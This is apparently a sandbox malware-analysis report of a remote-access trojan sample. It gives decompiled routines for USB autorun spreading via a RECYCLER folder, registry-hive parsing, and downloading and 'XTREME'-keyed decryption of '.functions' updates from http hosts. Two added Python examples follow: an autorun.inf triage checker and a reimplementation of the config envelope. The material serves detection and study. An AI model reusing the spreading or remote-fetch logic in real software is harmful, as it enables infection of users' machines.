                  Uniqueness Score: -1.00%

                  C-Code - Quality: 51%
                  			E1000B0D0(intOrPtr* __eax, void* __ebx, void* __ecx, signed int __edx, signed int __esi) {
                  				void* _v1;
                  				char _v8;
                  				char _v12;
                  				intOrPtr _v16;
                  				char _v20;
                  				char _v24;
                  				char _v28;
                  				char _v32;
                  				char _v36;
                  				char _v40;
                  				char _v44;
                  				char _v48;
                  				char _v52;
                  				char _v56;
                  				signed char _t60;
                  				signed char _t61;
                  				signed char _t62;
                  				signed char _t63;
                  				void* _t71;
                  				void* _t92;
                  				void* _t98;
                  				signed char _t117;
                  				intOrPtr _t120;
                  				intOrPtr _t133;
                  				void* _t142;
                  				void* _t148;
                  				signed int _t150;
                  				intOrPtr _t151;
                  				intOrPtr _t152;
                  
                  				_t147 = __esi;
                  				_t60 = __eax +  *__eax;
                  				 *_t60 =  *_t60 + _t60;
                  				_pop(_t152);
                  				 *_t60 =  *_t60 + _t60;
                  				 *((intOrPtr*)(__ecx + __esi * 4)) =  *((intOrPtr*)(__ecx + __esi * 4)) + _t60;
                  				 *_t60 =  *_t60 + __edx;
                  				 *_t60 =  *_t60 + _t60;
                  				 *_t60 =  *_t60 + _t60;
                  				 *_t60 =  *_t60 + _t60;
                  				 *_t60 =  *_t60 + _t60;
                  				_t61 = _t60 & 0x000000b1;
                  				 *_t61 =  *_t61 + __edx;
                  				 *_t61 =  *_t61 + _t61;
                  				 *_t61 =  *_t61 + _t61;
                  				 *_t61 =  *_t61 + _t61;
                  				 *_t61 =  *_t61 + _t61;
                  				 *_t61 =  *_t61 + _t61;
                  				 *_t61 =  *_t61 + _t61;
                  				 *_t61 =  *_t61 + _t61;
                  				 *_t61 =  *_t61 + _t61;
                  				asm("adc [eax], cl");
                  				 *_t61 =  *_t61 + _t61;
                  				 *((intOrPtr*)(_t61 + __edx)) =  *((intOrPtr*)(_t61 + __edx)) + __ebx;
                  				 *_t61 =  *_t61 + __edx;
                  				asm("clc");
                  				 *_t61 =  *_t61 - _t61;
                  				asm("adc [edx+ebp], al");
                  				 *_t61 =  *_t61 + __edx;
                  				 *_t61 =  *_t61 + __edx;
                  				_t62 = _t61 | 0x0000002a;
                  				 *_t62 =  *_t62 + __edx;
                  				 *__edx =  *__edx;
                  				 *_t62 =  *_t62 + __edx;
                  				asm("fsubr qword [eax]");
                  				 *_t62 =  *_t62 + __edx;
                  				asm("clc");
                  				 *_t62 =  *_t62 - _t62;
                  				asm("adc [ecx+ebp], dh");
                  				 *_t62 =  *_t62 + __edx;
                  				_push(cs);
                  				 *_t62 =  *_t62 + _t62;
                  				 *_t62 =  *_t62 + _t62;
                  				 *0 =  *0 + _t62;
                  				 *_t62 =  *_t62 + _t62;
                  				 *((intOrPtr*)(_t62 + __edx)) =  *((intOrPtr*)(_t62 + __edx));
                  				 *_t62 =  *_t62 + __edx;
                  				_t63 = _t62;
                  				 *_t63 =  *_t63 + _t63;
                  				 *(_t148 + 0x53 + __edx * 2) =  *(_t148 + 0x53 + __edx * 2) | __edx;
                  				asm("popad");
                  				_t150 =  *(__esi - 0x70) * 0x51ec8b55;
                  				_push(_t150);
                  				_t151 = _t152;
                  				_push(0);
                  				_t120 = 6;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t120 = _t120 - 1;
                  					_t154 = _t120;
                  				} while (_t120 != 0);
                  				_t16 =  &_v8;
                  				 *_t16 = _t120;
                  				_push(__ebx);
                  				_v8 =  *_t16;
                  				_t117 = _t63;
                  				E10003C28( &_v8);
                  				_push(_t151);
                  				_push(0x1000b2fa);
                  				 *[fs:eax] = _t152;
                  				E10003988( &_v12, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\", _v8, _t154);
                  				_t71 = E10005690(E1000390C(_v12),  *[fs:eax]);
                  				_t155 = _t71;
                  				if(_t71 != 0) {
                  					_push(0);
                  					E1000B038( *((intOrPtr*)(_t117 + 4)), _t117, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\",  &_v24);
                  					_t125 = _v24;
                  					E10003988( &_v20, _v24, _v12, _t155);
                  					_push(E1000390C(_v20));
                  					_push(E1000390C( *((intOrPtr*)(_t117 + 4))));
                  					L10004DC8();
                  					_push(L"[autorun]\r\n;open=RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
                  					E1000B038( *((intOrPtr*)(_t117 + 4)), _t117, _v24,  &_v28);
                  					_push(_v28);
                  					_push(0x1000b418);
                  					_push(L"icon=shell32.dll,4");
                  					_push(0x1000b418);
                  					_push(L"shellexecute=");
                  					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
                  					E1000B038( *((intOrPtr*)(_t117 + 4)), _t117, _v24,  &_v32);
                  					_push(_v32);
                  					_push(0x1000b418);
                  					_push(L"label=PENDRIVE");
                  					_push(0x1000b418);
                  					_push(L"action=Open folder to view files");
                  					_push(0x1000b418);
                  					_push(L"shell\\Open=Open");
                  					_push(0x1000b418);
                  					_push(L"shell\\Open\\command=");
                  					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
                  					E1000B038( *((intOrPtr*)(_t117 + 4)), _t117, _t125,  &_v36);
                  					_push(_v36);
                  					_push(0x1000b418);
                  					_push(L"shell\\Open\\Default=1");
                  					E100039EC();
                  					_t92 = E1000391C(_v16) + _t91;
                  					_t156 = _t92;
                  					asm("cdq");
                  					_push(0x14);
                  					_push(_t92);
                  					_push(E1000390C(_v16));
                  					E10003988( &_v40, L"autorun.inf", _v8, _t92);
                  					_t98 = E1000390C(_v40);
                  					_pop(_t142);
                  					E10005EB4(_t98, _t142);
                  					E10003988( &_v44, L"autorun.inf", _v8, _t92);
                  					E10005F1C(_v44, _t117, L"autorun.inf", __esi);
                  					_t128 = L"RECYCLER\\";
                  					E10003988( &_v48, L"RECYCLER\\", _v8, _t92);
                  					E10005F1C(_v48, _t117, L"RECYCLER\\", __esi);
                  					E10005F1C(_v12, _t117, L"RECYCLER\\", __esi);
                  					E1000B038( *((intOrPtr*)(_t117 + 4)), _t117, _t128,  &_v56);
                  					E10003988( &_v52, _v56, _v12, _t156);
                  					E10005F1C(_v52, _t117, _v56, _t147);
                  				}
                  				_pop(_t133);
                  				 *[fs:eax] = _t133;
                  				_push(E1000B301);
                  				return E10003788( &_v56, 0xd);
			}

			Instruction address column for E1000B0D0 (one address per decompiled line above; per-line alignment lost in extraction): 0x1000b0d0 through 0x1000b2f9.

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: RECYCLER\$RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$[autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$action=Open folder to view files$autorun.inf$icon=shell32.dll,4$label=PENDRIVE$shell\Open=Open$shell\Open\Default=1$shell\Open\command=$shellexecute=
                  • API String ID: 0-631342129
                  • Opcode ID: 13ecfe44ea8818081acd79cdab56d55be9f714c6c0a79ac0d907a72402bacc2f
                  • Instruction ID: e38e5125926d32c1d26ff353fbb275c64c03e2d6fa0b8cc01eec99beb1e39287
                  • Opcode Fuzzy Hash: 13ecfe44ea8818081acd79cdab56d55be9f714c6c0a79ac0d907a72402bacc2f
                  • Instruction Fuzzy Hash: CA616334909688AFEB03DF64CC519DEBF75DF46280B5580E6F040AB15BD774AE05CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 39%
                  			E1000B140(void* __eax, void* __ebx, void* __ecx, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				intOrPtr _v16;
                  				char _v20;
                  				char _v24;
                  				char _v28;
                  				char _v32;
                  				char _v36;
                  				char _v40;
                  				char _v44;
                  				char _v48;
                  				char _v52;
                  				char _v56;
                  				void* _t52;
                  				void* _t73;
                  				void* _t79;
                  				void* _t98;
                  				intOrPtr _t100;
                  				intOrPtr _t111;
                  				void* _t120;
                  				intOrPtr _t127;
                  				intOrPtr _t128;
                  
                  				_t125 = __esi;
                  				_t127 = _t128;
                  				_t100 = 6;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t100 = _t100 - 1;
                  					_t129 = _t100;
                  				} while (_t100 != 0);
                  				_t1 =  &_v8;
                  				 *_t1 = _t100;
                  				_v8 =  *_t1;
                  				_t98 = __eax;
                  				E10003C28( &_v8);
                  				_push(_t127);
                  				_push(0x1000b2fa);
                  				 *[fs:eax] = _t128;
                  				E10003988( &_v12, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\", _v8, _t129);
                  				_t52 = E10005690(E1000390C(_v12),  *[fs:eax]);
                  				_t130 = _t52;
                  				if(_t52 != 0) {
                  					_push(0);
                  					E1000B038( *((intOrPtr*)(_t98 + 4)), _t98, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\",  &_v24);
                  					_t105 = _v24;
                  					E10003988( &_v20, _v24, _v12, _t130);
                  					_push(E1000390C(_v20));
                  					_push(E1000390C( *((intOrPtr*)(_t98 + 4))));
                  					L10004DC8();
                  					_push(L"[autorun]\r\n;open=RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
                  					E1000B038( *((intOrPtr*)(_t98 + 4)), _t98, _v24,  &_v28);
                  					_push(_v28);
                  					_push(0x1000b418);
                  					_push(L"icon=shell32.dll,4");
                  					_push(0x1000b418);
                  					_push(L"shellexecute=");
                  					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
                  					E1000B038( *((intOrPtr*)(_t98 + 4)), _t98, _v24,  &_v32);
                  					_push(_v32);
                  					_push(0x1000b418);
                  					_push(L"label=PENDRIVE");
                  					_push(0x1000b418);
                  					_push(L"action=Open folder to view files");
                  					_push(0x1000b418);
                  					_push(L"shell\\Open=Open");
                  					_push(0x1000b418);
                  					_push(L"shell\\Open\\command=");
                  					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
                  					E1000B038( *((intOrPtr*)(_t98 + 4)), _t98, _t105,  &_v36);
                  					_push(_v36);
                  					_push(0x1000b418);
                  					_push(L"shell\\Open\\Default=1");
                  					E100039EC();
                  					_t73 = E1000391C(_v16) + _t72;
                  					_t131 = _t73;
                  					asm("cdq");
                  					_push(0x14);
                  					_push(_t73);
                  					_push(E1000390C(_v16));
                  					E10003988( &_v40, L"autorun.inf", _v8, _t73);
                  					_t79 = E1000390C(_v40);
                  					_pop(_t120);
                  					E10005EB4(_t79, _t120);
                  					E10003988( &_v44, L"autorun.inf", _v8, _t73);
                  					E10005F1C(_v44, _t98, L"autorun.inf", __esi);
                  					_t108 = L"RECYCLER\\";
                  					E10003988( &_v48, L"RECYCLER\\", _v8, _t73);
                  					E10005F1C(_v48, _t98, L"RECYCLER\\", __esi);
                  					E10005F1C(_v12, _t98, L"RECYCLER\\", __esi);
                  					E1000B038( *((intOrPtr*)(_t98 + 4)), _t98, _t108,  &_v56);
                  					E10003988( &_v52, _v56, _v12, _t131);
                  					E10005F1C(_v52, _t98, _v56, _t125);
                  				}
                  				_pop(_t111);
                  				 *[fs:eax] = _t111;
                  				_push(E1000B301);
                  				return E10003788( &_v56, 0xd);
                  			}
                  Instruction address gutter for the listing above (one address per statement, flattened by extraction): 0x1000b140 .. 0x1000b2f9

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: RECYCLER\$RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$[autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$action=Open folder to view files$autorun.inf$icon=shell32.dll,4$label=PENDRIVE$shell\Open=Open$shell\Open\Default=1$shell\Open\command=$shellexecute=
                  • API String ID: 0-631342129
                  • Opcode ID: f3564a97d53de12c9b48bdf10bff330839f6c1832b8590ef24407a4c5debb447
                  • Instruction ID: 6ae93d5114324f60805c066673cfebbd25bb18d06d828e6891266f46ee2437b0
                  • Opcode Fuzzy Hash: f3564a97d53de12c9b48bdf10bff330839f6c1832b8590ef24407a4c5debb447
                  • Instruction Fuzzy Hash: 71410E38900909ABEB05EF94CD82DDEB7B9EF44281F90C165F500B725EDB71BE058BA0
                  Uniqueness

                  Uniqueness Score: -1.00%
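
The listing above is the removable-drive spreader: it creates a RECYCLER\S-1-5-21-...\ directory on the drive, copies the server binary there, and writes an autorun.inf whose shellexecute and shell\Open\command directives point at that binary, dressed up with label=PENDRIVE, action=Open folder to view files and shell\Open\Default=1 so that the hijacked "Open" verb is the default double-click action. The open= directive is written commented out (";open="). The following Python triage routine is an added example, not the sample's code and not part of the sandbox report: it parses an autorun.inf, lists every directive that would make Explorer execute something, and flags the indicators the listing fixes. The autorun.inf text it checks is constructed from the string literals in the listing; the executable name "payload.exe" is hypothetical (the listing takes it from a field of the object at _t98+4 that this page does not show), and the separator string at 0x1000b418 is assumed to be "\r\n".

```python
"""Triage an autorun.inf for the USB-spreading pattern in the listing above.

Added example, not the sample's code. SAMPLE_AUTORUN is constructed from the
string literals in the listing; "payload.exe" is a hypothetical file name.
"""
import re
from typing import Dict, List, Tuple

# Directory the dropper creates on the drive: RECYCLER\<SID>\ (literal from the listing).
RECYCLER_SID_DIR = re.compile(r"RECYCLER\\S-1-5-21(?:-\d+){3,4}\\", re.IGNORECASE)

# Directives that make Explorer run something when the drive is opened or double-clicked.
EXEC_KEYS = ("open", "shellexecute", "shell\\open\\command")

# Decoy directives the listing writes so the drive looks like an ordinary pendrive
# and the hijacked "Open" verb becomes the default action (shell\Open\Default=1).
DECOY_VALUES = {
    "label": "PENDRIVE",
    "action": "Open folder to view files",
    "shell\\open": "Open",
    "shell\\open\\default": "1",
}

# Constructed from the listing: "[autorun]\r\n;open=..." followed by the other
# directives, each separated by the string at 0x1000b418 (assumed to be "\r\n").
PAYLOAD_DIR = "RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\"
SAMPLE_AUTORUN = "\r\n".join([
    "[autorun]",
    ";open=" + PAYLOAD_DIR + "payload.exe",      # hypothetical file name
    "icon=shell32.dll,4",
    "shellexecute=" + PAYLOAD_DIR + "payload.exe",
    "label=PENDRIVE",
    "action=Open folder to view files",
    "shell\\Open=Open",
    "shell\\Open\\command=" + PAYLOAD_DIR + "payload.exe",
    "shell\\Open\\Default=1",
])

# Constructed benign installer autorun.inf for contrast.
BENIGN_AUTORUN = "[autorun]\r\nopen=setup.exe\r\nicon=setup.exe,0\r\nlabel=Product Installer\r\n"


def parse_autorun(text: str) -> Dict[str, List[str]]:
    """Parse autorun.inf into {lower-cased key: [values]}.

    Commented lines are kept under the key ';' because the dropper leaves the
    payload path behind in a commented-out 'open=' directive.
    """
    entries: Dict[str, List[str]] = {}
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if line.startswith(";"):
            entries.setdefault(";", []).append(line[1:].strip())
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, value = line.split("=", 1)
        entries.setdefault(key.strip().lower(), []).append(value.strip())
    return entries


def triage_autorun(text: str) -> Dict[str, object]:
    """Return the exec targets plus the findings that mark this dropper's autorun.inf."""
    entries = parse_autorun(text)
    findings: List[str] = []
    exec_targets: List[Tuple[str, str]] = []
    for key in EXEC_KEYS:
        for value in entries.get(key, []):
            exec_targets.append((key, value))
            if RECYCLER_SID_DIR.search(value):
                findings.append(f"{key} runs a file under a RECYCLER SID directory: {value}")
    for comment in entries.get(";", []):
        if RECYCLER_SID_DIR.search(comment):
            findings.append(f"commented-out directive still names the RECYCLER SID directory: {comment}")
    matched = [k for k, v in DECOY_VALUES.items()
               if any(x.lower() == v.lower() for x in entries.get(k, []))]
    if len(matched) == len(DECOY_VALUES):
        findings.append("label/action/shell\\Open decoy set matches the listing")
    return {"malicious": bool(findings), "findings": findings, "exec_targets": exec_targets}
```

Run triage_autorun() over the autorun.inf of each mounted removable drive; any exec directive that resolves into a RECYCLER\S-1-5-21-...\ directory is by itself sufficient to quarantine the drive, since no legitimate autorun points into a recycle-bin SID folder, and the commented ";open=" line is kept as evidence because it survives even if the active directives are later edited.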

                  C-Code - Quality: 58%
                  			E10005A94(char __eax, void* __ebx, void* __ecx) {
                  				char _v8;
                  				intOrPtr _t52;
                  				intOrPtr _t64;
                  
                  				_v8 = __eax;
                  				E10003C28( &_v8);
                  				_push(_t64);
                  				_push(0x10005b87);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t64;
                  				E10003A34(_v8, L"HKEY_CLASSES_ROOT");
                  				if(0 != 0) {
                  					E10003A34(_v8, L"HKCR");
                  					if(0 != 0) {
                  						E10003A34(_v8, L"HKEY_CURRENT_USER");
                  						if(__eflags == 0) {
                  							L5:
                  						} else {
                  							E10003A34(_v8, L"HKCU");
                  							if(__eflags != 0) {
                  								E10003A34(_v8, L"HKEY_LOCAL_MACHINE");
                  								if(__eflags == 0) {
                  									L8:
                  								} else {
                  									E10003A34(_v8, L"HKLM");
                  									if(__eflags != 0) {
                  										E10003A34(_v8, L"HKEY_USERS");
                  										if(__eflags == 0) {
                  											L11:
                  										} else {
                  											E10003A34(_v8, 0x10005c60);
                  											if(__eflags != 0) {
                  												E10003A34(_v8, L"HKEY_CURRENT_CONFIG");
                  												if(__eflags == 0) {
                  													L14:
                  												} else {
                  													E10003A34(_v8, L"HKCC");
                  													if(__eflags == 0) {
                  														goto L14;
                  													}
                  												}
                  											} else {
                  												goto L11;
                  											}
                  										}
                  									} else {
                  										goto L8;
                  									}
                  								}
                  							} else {
                  								goto L5;
                  							}
                  						}
                  					} else {
                  						goto L2;
                  					}
                  				}
                  				_pop(_t52);
                  				 *[fs:eax] = _t52;
                  				_push(E10005B8E);
                  				return E10003770( &_v8);
                  			}
                  Instruction address gutter for the listing above (flattened by extraction; 0x00000000 entries are goto/fall-through lines with no code): 0x10005a99 .. 0x10005b86

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                  • API String ID: 0-909552448
                  • Opcode ID: 19a7d89fdd0d4a8943666261cc10e3fb7835feb1d7da3395f8e32f4d42fefbdb
                  • Instruction ID: 07abd4759daa604870a4f77bd8534178fed91fd4fee8f89ff290bb29f67fd9b2
                  • Opcode Fuzzy Hash: 19a7d89fdd0d4a8943666261cc10e3fb7835feb1d7da3395f8e32f4d42fefbdb
                  • Instruction Fuzzy Hash: E5211D38B041C99BF711DA99858295FB3E9DB8D7C2FB08091B8415731EDB37BF019622
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 67%
                  			E1000A558(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
                  				char _v8;
                  				intOrPtr* _v12;
                  				char _v13;
                  				char _v20;
                  				char _v24;
                  				char _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v2520;
                  				intOrPtr _v2524;
                  				char _v4964;
                  				void _v5044;
                  				char _v5048;
                  				char _v5052;
                  				char _v5056;
                  				intOrPtr _v5060;
                  				char _v5064;
                  				char _v5068;
                  				char _v5072;
                  				char _v5076;
                  				char _v5080;
                  				char _v5084;
                  				char _v5088;
                  				void* _t113;
                  				void* _t152;
                  				void* _t156;
                  				intOrPtr _t166;
                  				void* _t186;
                  				void* _t191;
                  				void* _t213;
                  				void* _t225;
                  				char* _t226;
                  				intOrPtr _t228;
                  				intOrPtr* _t232;
                  				char _t246;
                  				intOrPtr _t249;
                  				void* _t259;
                  				char* _t260;
                  				char _t273;
                  				void* _t274;
                  				char* _t275;
                  				intOrPtr _t291;
                  				void* _t293;
                  				intOrPtr* _t294;
                  				void* _t296;
                  				void* _t297;
                  
                  				_t246 = __edx;
                  				_t296 = _t297;
                  				_t228 = 0x27b;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t228 = _t228 - 1;
                  				} while (_t228 != 0);
                  				_t1 =  &_v8;
                  				 *_t1 = _t228;
                  				_push(__ebx);
                  				_t293 = __eax;
                  				_push( *_t1);
                  				memcpy( &_v5044, __eax, 0x4e4 << 2);
                  				_pop(_t232);
                  				_v12 = _t232;
                  				_v8 = _t246;
                  				E10003C28( &_v8);
                  				_push(_t296);
                  				_push(0x1000a98b);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t297 + 0xc;
                  				E10003770(_v12);
                  				_push("URLMON.DLL");
                  				L10004EE8();
                  				_push("shell32.dll");
                  				L10004EE8();
                  				E100037D0( &_v24, L"XTREME");
                  				_v13 = 0;
                  				_t225 = E1000390C(_v8);
                  				_t113 = E10005CA4(_t225);
                  				_t301 = _t113;
                  				if(_t113 == 0) {
                  					L8:
                  					_t291 = 0x14;
                  					_t226 =  &_v4964;
                  					_t294 =  &_v5044;
                  					do {
                  						E100034B0( &_v5052, 0x3d, _t226);
                  						__eflags = _v5052;
                  						if(_v5052 != 0) {
                  							__eflags =  *_t294;
                  							if( *_t294 > 0) {
                  								_push("http://");
                  								E100034B0( &_v5064, 0x3d, _t226);
                  								_push(_v5064);
                  								_push(0x1000aa2c);
                  								E100035A0();
                  								_t255 = _v5060;
                  								E100038FC( &_v5056, _v5060);
                  								_push(_v5056);
                  								asm("cdq");
                  								E10005CCC( &_v5068, 0x3d, _v5060,  *_t294, _t255);
                  								_push(_v5068);
                  								_push(0x1000aa34);
                  								E10005CCC( &_v5072, 0x3d, _t255, _v2524, _v2520);
                  								_push(_v5072);
                  								_push(L".functions");
                  								E100039EC();
                  								E10003898( &_v5076, E1000390C(_v8));
                  								_push(_v5076);
                  								E10003898( &_v5080, E1000390C(_v20));
                  								_pop(_t259);
                  								_t152 = E10005F88(_v5080, _t226, _t259);
                  								__eflags = _t152 - 1;
                  								if(_t152 != 1) {
                  									_push(E1000390C(_v8));
                  									L10004E30();
                  								} else {
                  									_t156 = E1000390C(_v8);
                  									_t260 =  &_v28;
                  									_v36 = E10005E30(_t156, _t260);
                  									_v32 = _t260;
                  									__eflags = _v32;
                  									if(__eflags != 0) {
                  										if(__eflags > 0) {
                  											goto L16;
                  										}
                  									} else {
                  										__eflags = _v36;
                  										if(_v36 > 0) {
                  											L16:
                  											E10003BE4( &_v20, E10003FD4(_v36, _v32, 2, 0));
                  											E100050D0(E1000390C(_v20), _v28);
                  											_t166 = E10003B94(L"STARTSERVERBUFFER", _v20);
                  											__eflags = _t166;
                  											if(_t166 > 0) {
                  												__eflags = E10003B94(L"ENDSERVERBUFFER", _v20);
                  												if(__eflags > 0) {
                  													E10003B04( &_v20, 0x11, 1, __eflags);
                  													E10003B04( &_v20, 0xf, E1000391C(_v20) - 0xf, __eflags);
                  													E10006234(_v20, _t226,  &_v5084, _v24, _t294, __eflags);
                  													E100037AC(_v12, _v5084);
                  													_push(L"STARTSERVERBUFFER");
                  													_push( *_v12);
                  													_push(L"ENDSERVERBUFFER");
                  													E100039EC();
                  													E10006234(_v20, _t226,  &_v5088, _v24, _t294, __eflags);
                  													_t273 = _v5088;
                  													E100037D0( &_v20, _t273);
                  													_t186 = E1000391C(_v20);
                  													asm("cdq");
                  													_push(_t273);
                  													_push(_t186 + _t186);
                  													_push(E1000390C(_v20));
                  													_t191 = E1000390C(_v8);
                  													_pop(_t274);
                  													E10005EB4(_t191, _t274);
                  													E10005F1C(_v8, _t226,  &_v5088, _t294);
                  													_v13 = 1;
                  												}
                  											}
                  										}
                  									}
                  								}
                  							}
                  						}
                  						_t294 = _t294 + 4;
                  						_t226 = _t226 + 0x7a;
                  						_t291 = _t291 - 1;
                  						__eflags = _t291;
                  					} while (_t291 != 0);
                  				} else {
                  					_push(0x80);
                  					_push(_t225);
                  					L10004F30();
                  					_t275 =  &_v28;
                  					_v36 = E10005E30(_t225, _t275);
                  					_v32 = _t275;
                  					E10003BE4( &_v20, E10003FD4(_v36, _v32, 2, 0));
                  					E100050D0(E1000390C(_v20), _v28);
                  					E10006234(_v20, _t225,  &_v5048, _v24, _t293, _t301);
                  					E100037D0( &_v20, _v5048);
                  					if(E10003B94(L"STARTSERVERBUFFER", _v20) <= 0) {
                  						L7:
                  						_push(E1000390C(_v8));
                  						L10004E30();
                  						goto L8;
                  					} else {
                  						_t213 = E10003B94(L"ENDSERVERBUFFER", _v20);
                  						_t303 = _t213;
                  						if(_t213 <= 0) {
                  							goto L7;
                  						} else {
                  							E10005F1C(_v8, _t225,  &_v5048, _t293);
                  							E10003B04( &_v20, 0x11, 1, _t303);
                  							E10003B04( &_v20, 0xf, E1000391C(_v20) - 0xf, _t303);
                  							E100037AC(_v12, _v20);
                  							_v13 = 1;
                  						}
                  					}
                  				}
                  				_pop(_t249);
                  				 *[fs:eax] = _t249;
                  				_push(E1000A992);
                  				E10003788( &_v5088, 6);
                  				E100032F0( &_v5064, 2);
                  				E10003770( &_v5056);
                  				E100032CC( &_v5052);
                  				E10003770( &_v5048);
                  				E10003788( &_v24, 2);
                  				return E10003770( &_v8);
                  			}
                  Instruction address gutter for the listing above (flattened by extraction; 0x00000000 entries are goto/fall-through lines with no code): 0x1000a558 .. 0x1000a98a

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .functions$ENDSERVERBUFFER$STARTSERVERBUFFER$URLMON.DLL$XTREME$http://$shell32.dll
                  • API String ID: 0-4263465085
                  • Opcode ID: 470b965d5662e412d8179e10860a8eacdfdba3da0a7e451b88e4202af90a0bea
                  • Instruction ID: 095f8cd7e1ad7f54d17a8aaba90678f4abf6843293fa25502bb1c2560b129c41
                  • Opcode Fuzzy Hash: 470b965d5662e412d8179e10860a8eacdfdba3da0a7e451b88e4202af90a0bea
                  • Instruction Fuzzy Hash: 3FB14D78A001199BEB11DBA4CC82ADFB7B9FF44380F5081A5F504A765ADB74AF858F50
                  Uniqueness

                  Uniqueness Score: -1.00%
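
The listing above is the update/fetch routine: it loads URLMON.DLL and shell32.dll, walks 0x14 (20) entries spaced 0x7a bytes apart building "http://" + host + ... + ".functions" URLs, downloads each to a file, reads the file, passes it through E10006234 with the string "XTREME" as the key, and only then looks for STARTSERVERBUFFER and ENDSERVERBUFFER in the result. When both are present it trims 0x11 (17) characters from the front and 0xf (15) from the end, which are exactly the lengths of the two markers, so the markers double as a known-plaintext check that the keyed transform succeeded before the inner buffer is accepted as the new server buffer (and, in the loop branch, re-wrapped, re-encoded and written back to the file). The Python below is an added example, not the sample's code: it reproduces that envelope handling on constructed data. The listing does not name the cipher behind E10006234, so RC4 is an assumption here (it is consistent with the routine being used in both directions), as is the choice of UTF-16-LE for the decoded text (the listing works on wide strings and writes Length*2 bytes); the function tries UTF-16-LE first and falls back to latin-1.

```python
"""Recover the server buffer from a downloaded '.functions' blob.

Added example, not the sample's code. The marker strings and the key "XTREME"
are literals from the listing; RC4 and the UTF-16-LE text encoding are ASSUMED.
"""
from typing import Optional, Tuple

START = "STARTSERVERBUFFER"   # 17 characters == the 0x11 trimmed in the listing
END = "ENDSERVERBUFFER"       # 15 characters == the 0x0f trimmed in the listing
KEY = b"XTREME"               # key string passed to E10006234 in the listing


def marker_lengths() -> Tuple[int, int]:
    """The two trim constants in the listing are just the marker lengths."""
    return len(START), len(END)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (assumed cipher); symmetric, so the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                     # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                        # keystream generation and XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def extract_server_buffer(text: str) -> Optional[str]:
    """Mirror the listing: both markers must be present, then strip 17 from the
    front and 15 from the end. Returns None when either marker is missing."""
    if START not in text or END not in text:
        return None
    return text[len(START):len(text) - len(END)]


def recover_server_buffer(blob: bytes, key: bytes = KEY) -> Optional[Tuple[str, str]]:
    """Apply the keyed transform first, then validate with the markers.

    Returns (encoding, inner_buffer) or None if the markers never appear,
    which is what happens with a wrong key or an unrelated download.
    """
    plain = rc4(key, blob)
    for encoding in ("utf-16-le", "latin-1"):    # wide string assumed, 8-bit as fallback
        try:
            text = plain.decode(encoding)
        except UnicodeDecodeError:
            continue
        inner = extract_server_buffer(text)
        if inner is not None:
            return encoding, inner
    return None


def make_constructed_blob(inner: str, encoding: str = "utf-16-le", key: bytes = KEY) -> bytes:
    """Build a constructed '.functions' download: markers around INNER, then RC4."""
    return rc4(key, (START + inner + END).encode(encoding))


if __name__ == "__main__":
    blob = make_constructed_blob("CONSTRUCTED-SERVER-BUFFER")
    print(recover_server_buffer(blob))              # ('utf-16-le', 'CONSTRUCTED-SERVER-BUFFER')
    print(recover_server_buffer(blob, key=b"WRONG")) # None
```

A practitioner running this against a real capture should treat a None result as "wrong cipher or key" rather than "no config": the listing accepts a download only when both markers survive the transform, so the marker check is the oracle to iterate against when testing other candidate keys or ciphers.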

                  C-Code - Quality: 53%
